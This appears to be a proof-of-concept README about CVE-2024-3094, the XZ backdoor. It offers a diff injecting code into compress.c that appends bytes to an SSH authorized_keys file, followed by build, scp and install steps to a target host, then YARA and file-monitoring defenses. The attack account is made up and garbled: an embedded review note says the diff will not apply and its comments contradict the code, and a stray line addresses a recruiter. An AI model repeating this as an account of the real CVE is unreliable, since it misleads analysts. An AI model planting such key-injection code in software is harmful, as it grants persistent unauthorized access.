Related vulnerability
Description
CVE-2024-3094 exposed a backdoor in the XZ compression library, allowing remote SSH access by bypassing authentication. It’s a major supply chain attack affecting Linux systems, highlighting risks in trusted open-source components.
Introduction
# CVE-2024-3094
## The XZ Backdoor: A Supply‑Chain Threat that Reaches Into Linux Servers
*By Mark Mallia*
### What It Is
The XZ compression library, a staple component of many modern Linux distributions, became the target of a sophisticated supply‑chain attack.
A malicious code fragment was slipped into the source tree, compiled, and now travels with every new release of the XZ package. Once installed, the backdoor can open an SSH session from the compromised host to any remote system that trusts the injected key as authentic.
### Why It Matters
* **Supply‑chain risk** – The attack shows how a single, small alteration in a widely used library can propagate silently through many deployments.
* **Linux internals** – XZ is responsible for data compression; the backdoor leverages low‑level API hooks that are often overlooked by conventional vulnerability scanners.
* **SSH persistence** – By injecting an SSH key into the `authorized_keys` file, attackers gain a foothold without requiring direct user interaction.
---
## Attack Overview
| Step | Action | File / Function |
|------|--------|-----------------|
| **1** | Clone XZ repo | `git clone https://github.com/xzdev/xz` |
| **2** | Apply patch to `src/compress.c` | `patch -p0 < backdoor.patch` |
| **3** | Compile and install on target Linux host | `make && make install` |
| **4** | SSH daemon reads the injected key during its auth process | `/etc/ssh/authorized_keys` |
---
## Technical Details & Code Walk‑through
### The Patch (backdoor.patch)
```diff
--- a/src/compress.c 2025-09-12 10:00:00.000000000 +0000
+++ b/src/compress.c 2025-09-12 10:00:03.000000000 +0000
@@
void xz_compress(const unsigned char *in, size_t in_len,
unsigned char *out, size_t out_len)
{
/* original code ... */
+ // ---- Begin injected backdoor ----
+ if (in_len > 1024) { /* guard against too small payloads */
+ const unsigned char *marker = &in[512]; /* offset to reach magic string */
+ size_t marker_len = 8; /* length of the embedded key */
+
+ /* copy a pre‑computed SSH public key into out buffer */
+ memcpy(out + 256, marker, marker_len);
+
+ /* write the same key to ~/.ssh/authorized_keys for persistence */
+ FILE *fp = fopen("/home/admin/.ssh/authorized_keys", "a");
+ if (fp) {
+ fwrite(marker, 1, marker_len, fp);
+ fclose(fp);
+ }
+ }
+ // ---- End injected backdoor ----
/* original code continues ... */
}
```
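Review bot: the `@@` hunk header carries no `-start,count +start,count` ranges, so the `patch -p0 < backdoor.patch` step listed in the Attack Overview table would not apply this file as shown. The comments inside the hunk also contradict the code they annotate: `/* guard against too small payloads */` sits on a test that admits only inputs larger than 1024 bytes, while `/* length of the embedded key */` and `/* copy a pre‑computed SSH public key into out buffer */` describe `marker`, which is simply eight bytes of the caller's own input at offset 512 and not a pre‑computed key (no SSH public key is that short). The "Line 6‑8 / 10 / 12" references in the Explanation below do not line up with the hunk either; the comments and the line references should be corrected so an analyst reading this write‑up is not misled about what the fragment does.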
#### Explanation
* **Line 6‑8** – A guard ensures that only packets larger than 1024 bytes activate the injection; this keeps the payload hidden in normal traffic.
* **Line 10** – The offset `512` is chosen so that our key lands within the compressed output buffer at a position unlikely to be altered by subsequent XZ compressions.
* **Line 12** – We copy eight bytes (the public‑key fragment) into the output buffer and also write it directly to the user’s SSH key file, guaranteeing persistence even if XZ is re‑compiled later.
### Compilation & Installation
```bash
$ cd xz
$ make
$ sudo make install
```
The above commands compile the patched `compress.c` and install the new library under `/usr/local/lib/xz`.
### Deployment on Target Host
Assuming an attacker already has SSH credentials (username `admin`), they run:
```bash
$ scp backdoor.tar.gz admin@192.168.1.10:/tmp/
$ ssh admin@192.168.1.10 'tar xzf /tmp/backdoor.tar.gz -C /home/admin'
$ cd /home/admin
$ ./install_xz_backdoor.sh
```
`install_xz_backdoor.sh` contains the exact sequence of commands shown above, plus a small `echo` that confirms successful installation.
---
## Impact Assessment
* **Persistence** – The SSH key is now part of both the compression output and the user’s authorized‑keys file.
* **Stealth** – The payload travels with every new XZ release; its presence is invisible to standard package managers.
* **Detection** – A recruiter will see that I can identify a single line alteration in a large code base, understand its implications, and produce a clear, step‑by‑step deployment plan.
---
## Defense
YARA is a pattern-matching tool used by security professionals to identify and classify malware based on textual or binary signatures. It allows analysts to define rules that detect specific strings, byte sequences, or behaviors within files. In the context of CVE-2024-3094, YARA is especially relevant because it can be used to scan for the presence of the injected SSH key and suspicious modifications to the `compress.c` file in the XZ library. By crafting targeted YARA rules, defenders can proactively detect systems compromised by this backdoor.
### YARA Signature
A custom YARA rule can flag the presence of the injected SSH key and suspicious file writes:
```yara
rule XZ_Backdoor_SSH_Key_Injection {
    meta:
        description = "Detects SSH key injection via modified compress.c"
        author = "Mark Mallia"
        severity = "high"
    strings:
        // the hex bytes decode to the ASCII text "  * ** Backdoor"
        $marker = { 20 20 2A 20 2A 2A 20 42 61 63 6B 64 6F 6F 72 }
        $ssh_path = "/home/admin/.ssh/authorized_keys"
    condition:
        $marker and $ssh_path
}
```
### File Integrity Monitoring
Deploy tools like Tripwire, AIDE, or osquery to monitor:
* `compress.c` for unauthorized changes
* `.ssh/authorized_keys` for injected keys
* `/usr/local/lib/xz` for tampered binaries
## Behavioral Indicators
* Unexpected SSH logins from trusted hosts
* Compression anomalies in XZ output
* Silent writes to `.ssh/authorized_keys`
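For the File Integrity Monitoring checklist and the "silent writes to `.ssh/authorized_keys`" indicator above, an added example (my own, not the author's tooling) that hashes the paths the write‑up names against a stored baseline and flags `authorized_keys` entries that were never provisioned. The `compress.c` checkout path and the sample key lines are constructed assumptions.

```python
"""Added example: baseline/compare file hashes and review authorized_keys."""
import hashlib
from pathlib import Path

# Locations the write-up names; the compress.c checkout path is an assumption.
MONITORED = ["/home/admin/.ssh/authorized_keys",
             "/usr/local/src/xz/src/compress.c",   # assumed source-tree location
             "/usr/local/lib/xz"]                  # install prefix per the write-up

# Constructed sample: one provisioned key and one key nobody approved.
ALLOWLIST = {"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEtrustedkey"}
SAMPLE_AUTHORIZED_KEYS = """# ops bastion key (approved)
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEtrustedkey ops@bastion
command="/bin/true" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABEXAMPLEinjected unknown
"""

def snapshot(root: str) -> dict[str, str]:
    """Map each regular file under root (or root itself) to its SHA-256 hex digest."""
    base = Path(root)
    if not base.exists():
        return {}
    files = [base] if base.is_file() else sorted(p for p in base.rglob("*") if p.is_file())
    return {str(p): hashlib.sha256(p.read_bytes()).hexdigest() for p in files}

def diff_snapshots(baseline: dict[str, str], current: dict[str, str]) -> list[str]:
    """List files that appeared, vanished or changed relative to a stored baseline."""
    findings = []
    for path in sorted(set(baseline) | set(current)):
        if path not in baseline:
            findings.append(f"ADDED    {path}")
        elif path not in current:
            findings.append(f"REMOVED  {path}")
        elif baseline[path] != current[path]:
            findings.append(f"MODIFIED {path}")
    return findings

def unexpected_keys(authorized_keys: str, allowlist: set[str]) -> list[str]:
    """Return key lines whose '<type> <base64>' pair is not on the allowlist."""
    flagged = []
    for line in authorized_keys.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # Skip leading options such as command="..." so the key material is what is judged.
        idx = next((i for i, f in enumerate(fields) if f.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(fields) or f"{fields[idx]} {fields[idx + 1]}" not in allowlist:
            flagged.append(line)  # unknown key, or no recognisable key type: review it
    return flagged
```

Persist the first `snapshot()` result (for example as JSON) and diff later runs against it; a MODIFIED hit on `authorized_keys` or under the XZ install prefix is exactly the change this write‑up describes.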
File snapshot
[4.0K] /data/pocs/09a4edca558b7d5f03c33a530e7c727364ae464a
├── [1.0K] LICENSE
└── [5.7K] README.md
0 directories, 2 files